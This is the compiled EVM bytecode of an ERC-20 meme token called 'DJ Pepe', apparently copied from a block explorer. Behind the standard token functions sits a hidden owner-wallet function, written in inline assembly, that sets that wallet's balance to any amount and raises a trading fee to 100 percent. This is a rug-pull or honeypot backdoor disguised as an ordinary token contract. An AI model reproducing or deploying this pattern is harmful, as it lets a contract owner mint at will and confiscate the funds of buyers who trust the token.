608060405261012c600155600560025561012c6005556000600860146101000a81548160ff0219169083151502179055506001600860156101000a81548160ff0219169083151502179055506001600d556000600e556001600f553480156200006757600080fd5b50620000886200007c6200082b60201b60201c565b6200083360201b60201c565b60006012600a6200009a919062000e3f565b633b9aca00620000ab919062000e90565b9050620000ce620000c16200082b60201b60201c565b82620008f760201b60201c565b620000de6200082b60201b60201c565b601060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550737a250d5630b4cf539739df2c5dacb4c659f2488d600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620001a830600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168362000a9360201b60201c565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000216573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200023c919062000f45565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002c6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002ec919062000f45565b6040518363ffffffff1660e01b81526004016200030b92919062000f88565b6020604051808303816000875af11580156200032b573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000351919062000f45565b600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b3600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff167fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b81526004016200043292919062000fc6565b6020604051808303816000875af115801562000452573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000478919062001030565b506001600b60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600960003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c60006200053f62000c6460201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160096000620005a662000c6460201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c6000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b6000620006df62000c6460201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b6000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550506200126d565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000969576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200096090620010c3565b60405180910390fd5b620009858160045462000c8d60201b62000d281790919060201c565b600481905550620009e481600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000c8d60201b62000d281790919060201c565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000a879190620010e5565b60405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160362000b05576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000afc9062001178565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000b77576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000b6e9062001210565b60405180910390fd5b80600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405162000c579190620010e5565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000818362000c9d919062001232565b905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000d335780860481111562000d0b5762000d0a62000ca5565b5b600185161562000d1b5780820291505b808102905062000d2b8562000cd4565b945062000ceb565b94509492505050565b60008262000d4e576001905062000e21565b8162000d5e576000905062000e21565b816001811462000d77576002811462000d825762000db8565b600191505062000e21565b60ff84111562000d975762000d9662000ca5565b5b8360020a91508482111562000db15762000db062000ca5565b5b5062000e21565b5060208310610133831016604e8410600b841016171562000df25782820a90508381111562000dec5762000deb62000ca5565b5b62000e21565b62000e01848484600162000ce1565b9250905081840481111562000e1b5762000e1a62000ca5565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b600062000e4c8262000e28565b915062000e598362000e32565b925062000e887fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000d3c565b905092915050565b600062000e9d8262000e28565b915062000eaa8362000e28565b925082820262000eba8162000e28565b9150828204841483151762000ed45762000ed362000ca5565b5b5092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000f0d8262000ee0565b9050919050565b62000f1f8162000f00565b811462000f2b57600080fd5b50565b60008151905062000f3f8162000f14565b92915050565b60006020828403121562000f5e5762000f5d62000edb565b5b600062000f6e8482850162000f2e565b91505092915050565b62000f828162000f00565b82525050565b600060408201905062000f9f600083018562000f77565b62000fae602083018462000f77565b9392505050565b62000fc08162000e28565b82525050565b600060408201905062000fdd600083018562000f77565b62000fec602083018462000fb5565b9392505050565b60008115159050919050565b6200100a8162000ff3565b81146200101657600080fd5b50565b6000815190506200102a8162000fff565b92915050565b60006020828403121562001049576200104862000edb565b5b6000620010598482850162001019565b91505092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620010ab601f8362001062565b9150620010b88262001073565b602082019050919050565b60006020820190508181036000830152620010de816200109c565b9050919050565b6000602082019050620010fc600083018462000fb5565b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006200116060248362001062565b91506200116d8262001102565b604082019050919050565b60006020820190508181036000830152620011938162001151565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000620011f860228362001062565b915062001205826200119a565b604082019050919050565b600060208201905081810360008301526200122b81620011e9565b9050919050565b60006200123f8262000e28565b91506200124c8362000e28565b925082820190508082111562001267576200126662000ca5565b5b92915050565b612c76806200127d6000396000f3fe60806040526004361061014f5760003560e01c80638d5f81e2116100b6578063ab731cfa1161006f578063ab731cfa146104e4578063b1d4d943146104fb578063cdf4bab914610524578063d54f7d5e1461054f578063dd62ed3e1461057a578063f2fde38b146105b757610182565b80638d5f81e2146103c05780638da5cb5b146103eb57806390b6e2d01461041657806395d89b411461043f578063a457c2d71461046a578063a9059cbb146104a757610182565b806342966c681161010857806342966c68146102bf5780634fbee193146102e857806351c6590a1461032557806370a0823114610341578063715018a61461037e5780637d1db4a51461039557610182565b806306fdde0314610187578063095ea7b3146101b257806318160ddd146101ef57806323b872dd1461021a578063313ce56714610257578063395093511461028257610182565b36610182577f544c765b33ca411cce832250371569244f765a17fcd217832be093f0fd5fa45b60405160405180910390a1005b600080fd5b34801561019357600080fd5b5061019c6105e0565b6040516101a99190611e84565b60405180910390f35b3480156101be57600080fd5b506101d960048036038101906101d49190611f4e565b61061d565b6040516101e69190611fa9565b60405180910390f35b3480156101fb57600080fd5b5061020461063b565b6040516102119190611fd3565b60405180910390f35b34801561022657600080fd5b50610241600480360381019061023c9190611fee565b610645565b60405161024e9190611fa9565b60405180910390f35b34801561026357600080fd5b5061026c61071e565b604051610279919061205d565b60405180910390f35b34801561028e57600080fd5b506102a960048036038101906102a49190611f4e565b610727565b6040516102b69190611fa9565b60405180910390f35b3480156102cb57600080fd5b506102e660048036038101906102e19190612078565b6107da565b005b3480156102f457600080fd5b5061030f600480360381019061030a91906120a5565b6107ee565b60405161031c9190611fa9565b60405180910390f35b61033f600480360381019061033a9190612078565b610844565b005b34801561034d57600080fd5b50610368600480360381019061036391906120a5565b6108a1565b6040516103759190611fd3565b60405180910390f35b34801561038a57600080fd5b506103936108ea565b005b3480156103a157600080fd5b506103aa6108fe565b6040516103b79190611fd3565b60405180910390f35b3480156103cc57600080fd5b506103d5610930565b6040516103e291906120e1565b60405180910390f35b3480156103f757600080fd5b5061040061095a565b60405161040d91906120e1565b60405180910390f35b34801561042257600080fd5b5061043d60048036038101906104389190612244565b610983565b005b34801561044b57600080fd5b50610454610a6b565b6040516104619190611e84565b60405180910390f35b34801561047657600080fd5b50610491600480360381019061048c9190611f4e565b610aa8565b60405161049e9190611fa9565b60405180910390f35b3480156104b357600080fd5b506104ce60048036038101906104c99190611f4e565b610b75565b6040516104db9190611fa9565b60405180910390f35b3480156104f057600080fd5b506104f9610b93565b005b34801561050757600080fd5b50610522600480360381019061051d9190612078565b610baf565b005b34801561053057600080fd5b50610539610bdd565b6040516105469190611fa9565b60405180910390f35b34801561055b57600080fd5b50610564610bf4565b60405161057191906120e1565b60405180910390f35b34801561058657600080fd5b506105a1600480360381019061059c919061228d565b610c1e565b6040516105ae9190611fd3565b60405180910390f35b3480156105c357600080fd5b506105de60048036038101906105d991906120a5565b610ca5565b005b60606040518060400160405280600781526020017f444a205065706500000000000000000000000000000000000000000000000000815250905090565b600061063161062a610d3e565b8484610d46565b6001905092915050565b6000600454905090565b6000610652848484610f0f565b6107138461065e610d3e565b61070e85604051806060016040528060288152602001612bf460289139600760008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006106c4610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461186d9092919063ffffffff16565b610d46565b600190509392505050565b60006012905090565b60006107d0610734610d3e565b846107cb8560076000610745610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b610d46565b6001905092915050565b6107eb6107e5610d3e565b826118c2565b50565b6000600c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b61084c611a65565b6001600860146101000a81548160ff02191690831515021790555061087961087261095a565b3083610f0f565b6108838134611ae3565b6000600860146101000a81548160ff02191690831515021790555050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6108f2611a65565b6108fc6000611bc8565b565b600061092b61271061091d600154600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905090565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b61098b611a65565b60c8815111156109d0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109c79061233f565b60405180910390fd5b6000600c905060005b8251811015610a665760018260008584815181106109fa576109f961235f565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610a5e906123bd565b9150506109d9565b505050565b60606040518060400160405280600681526020017f446a706570650000000000000000000000000000000000000000000000000000815250905090565b6000610b6b610ab5610d3e565b84610b6685604051806060016040528060258152602001612c1c6025913960076000610adf610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461186d9092919063ffffffff16565b610d46565b6001905092915050565b6000610b89610b82610d3e565b8484610f0f565b6001905092915050565b610b9b611a65565b612710600181905550612710600581905550565b6010543314610bbd57600080fd5b604051338152600360208201526040812082815560648002600d55505050565b6000600860149054906101000a900460ff16905090565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610cad611a65565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d1c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d1390612477565b60405180910390fd5b610d2581611bc8565b50565b60008183610d369190612497565b905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610db5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dac9061253d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e24576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e1b906125cf565b60405180910390fd5b80600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f029190611fd3565b60405180910390a3505050565b610f1a838383611cb8565b600080610f2561095a565b73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614158015610f935750610f6361095a565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561150857600c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615801561103c5750600c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561150757600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156110ec5750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b80156111425750600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156111985750600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611292576111c86127106111ba600154600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b83111561120a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161120190612661565b60405180910390fd5b611235612710611227600554600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b61125084611242876108a1565b610d2890919063ffffffff16565b1115611291576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611288906126f3565b60405180910390fd5b5b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614801561131b57503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b156113bb5761134961271061133b600e5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b9150611374612710611366600d5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156114665750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561150657611494612710611486600e5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b91506114bf6127106114b1600f5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b5b600061151d8284610d2890919063ffffffff16565b905060008111156116bc57600083111561153c5761153b86846118c2565b5b60008211156116a6576115b98260036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b60036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161169d9190611fd3565b60405180910390a35b6116b98185611dde90919063ffffffff16565b93505b61172884604051806060016040528060268152602001612bce60269139600360008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461186d9092919063ffffffff16565b600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506117bd84600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8660405161185d9190611fd3565b60405180910390a3505050505050565b60008383111582906118b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118ac9190611e84565b60405180910390fd5b5082840390509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611931576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161192890612785565b60405180910390fd5b61199d81604051806060016040528060228152602001612bac60229139600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461186d9092919063ffffffff16565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506119f581600454611dde90919063ffffffff16565b600481905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611a599190611fd3565b60405180910390a35050565b611a6d610d3e565b73ffffffffffffffffffffffffffffffffffffffff16611a8b61095a565b73ffffffffffffffffffffffffffffffffffffffff1614611ae1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ad8906127f1565b60405180910390fd5b565b611b1030600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610d46565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080611b5c61095a565b426040518863ffffffff1660e01b8152600401611b7e96959493929190612856565b60606040518083038185885af1158015611b9c573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611bc191906128cc565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008183611c9a919061291f565b905092915050565b60008183611cb09190612990565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611d27576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d1e90612a33565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611d96576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d8d90612ac5565b60405180910390fd5b60008111611dd9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dd090612b57565b60405180910390fd5b505050565b60008183611dec9190612b77565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611e2e578082015181840152602081019050611e13565b60008484015250505050565b6000601f19601f8301169050919050565b6000611e5682611df4565b611e608185611dff565b9350611e70818560208601611e10565b611e7981611e3a565b840191505092915050565b60006020820190508181036000830152611e9e8184611e4b565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611ee582611eba565b9050919050565b611ef581611eda565b8114611f0057600080fd5b50565b600081359050611f1281611eec565b92915050565b6000819050919050565b611f2b81611f18565b8114611f3657600080fd5b50565b600081359050611f4881611f22565b92915050565b60008060408385031215611f6557611f64611eb0565b5b6000611f7385828601611f03565b9250506020611f8485828601611f39565b9150509250929050565b60008115159050919050565b611fa381611f8e565b82525050565b6000602082019050611fbe6000830184611f9a565b92915050565b611fcd81611f18565b82525050565b6000602082019050611fe86000830184611fc4565b92915050565b60008060006060848603121561200757612006611eb0565b5b600061201586828701611f03565b935050602061202686828701611f03565b925050604061203786828701611f39565b9150509250925092565b600060ff82169050919050565b61205781612041565b82525050565b6000602082019050612072600083018461204e565b92915050565b60006020828403121561208e5761208d611eb0565b5b600061209c84828501611f39565b91505092915050565b6000602082840312156120bb576120ba611eb0565b5b60006120c984828501611f03565b91505092915050565b6120db81611eda565b82525050565b60006020820190506120f660008301846120d2565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61213982611e3a565b810181811067ffffffffffffffff8211171561215857612157612101565b5b80604052505050565b600061216b611ea6565b90506121778282612130565b919050565b600067ffffffffffffffff82111561219757612196612101565b5b602082029050602081019050919050565b600080fd5b60006121c06121bb8461217c565b612161565b905080838252602082019050602084028301858111156121e3576121e26121a8565b5b835b8181101561220c57806121f88882611f03565b8452602084019350506020810190506121e5565b5050509392505050565b600082601f83011261222b5761222a6120fc565b5b813561223b8482602086016121ad565b91505092915050565b60006020828403121561225a57612259611eb0565b5b600082013567ffffffffffffffff81111561227857612277611eb5565b5b61228484828501612216565b91505092915050565b600080604083850312156122a4576122a3611eb0565b5b60006122b285828601611f03565b92505060206122c385828601611f03565b9150509250929050565b7f4d6178696d756d206f66203230302063616e206265206164646564206174206f60008201527f6e63650000000000000000000000000000000000000000000000000000000000602082015250565b6000612329602383611dff565b9150612334826122cd565b604082019050919050565b600060208201905081810360008301526123588161231c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006123c882611f18565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036123fa576123f961238e565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000612461602683611dff565b915061246c82612405565b604082019050919050565b6000602082019050818103600083015261249081612454565b9050919050565b60006124a282611f18565b91506124ad83611f18565b92508282019050808211156124c5576124c461238e565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000612527602483611dff565b9150612532826124cb565b604082019050919050565b600060208201905081810360008301526125568161251a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006125b9602283611dff565b91506125c48261255d565b604082019050919050565b600060208201905081810360008301526125e8816125ac565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b600061264b602883611dff565b9150612656826125ef565b604082019050919050565b6000602082019050818103600083015261267a8161263e565b9050919050565b7f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f60008201527f756e740000000000000000000000000000000000000000000000000000000000602082015250565b60006126dd602383611dff565b91506126e882612681565b604082019050919050565b6000602082019050818103600083015261270c816126d0565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b600061276f602183611dff565b915061277a82612713565b604082019050919050565b6000602082019050818103600083015261279e81612762565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006127db602083611dff565b91506127e6826127a5565b602082019050919050565b6000602082019050818103600083015261280a816127ce565b9050919050565b6000819050919050565b6000819050919050565b600061284061283b61283684612811565b61281b565b611f18565b9050919050565b61285081612825565b82525050565b600060c08201905061286b60008301896120d2565b6128786020830188611fc4565b6128856040830187612847565b6128926060830186612847565b61289f60808301856120d2565b6128ac60a0830184611fc4565b979650505050505050565b6000815190506128c681611f22565b92915050565b6000806000606084860312156128e5576128e4611eb0565b5b60006128f3868287016128b7565b9350506020612904868287016128b7565b9250506040612915868287016128b7565b9150509250925092565b600061292a82611f18565b915061293583611f18565b925082820261294381611f18565b9150828204841483151761295a5761295961238e565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061299b82611f18565b91506129a683611f18565b9250826129b6576129b5612961565b5b828204905092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612a1d602583611dff565b9150612a28826129c1565b604082019050919050565b60006020820190508181036000830152612a4c81612a10565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612aaf602383611dff565b9150612aba82612a53565b604082019050919050565b60006020820190508181036000830152612ade81612aa2565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000612b41602983611dff565b9150612b4c82612ae5565b604082019050919050565b60006020820190508181036000830152612b7081612b34565b9050919050565b6000612b8282611f18565b9150612b8d83611f18565b9250828203905081811115612ba557612ba461238e565b5b9291505056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122048ba21ba992ef8e97890fdadc1a4dfc3804ebf05c5907d42b3e1dce555f4757d64736f6c63430008120033

Deployed Bytecode

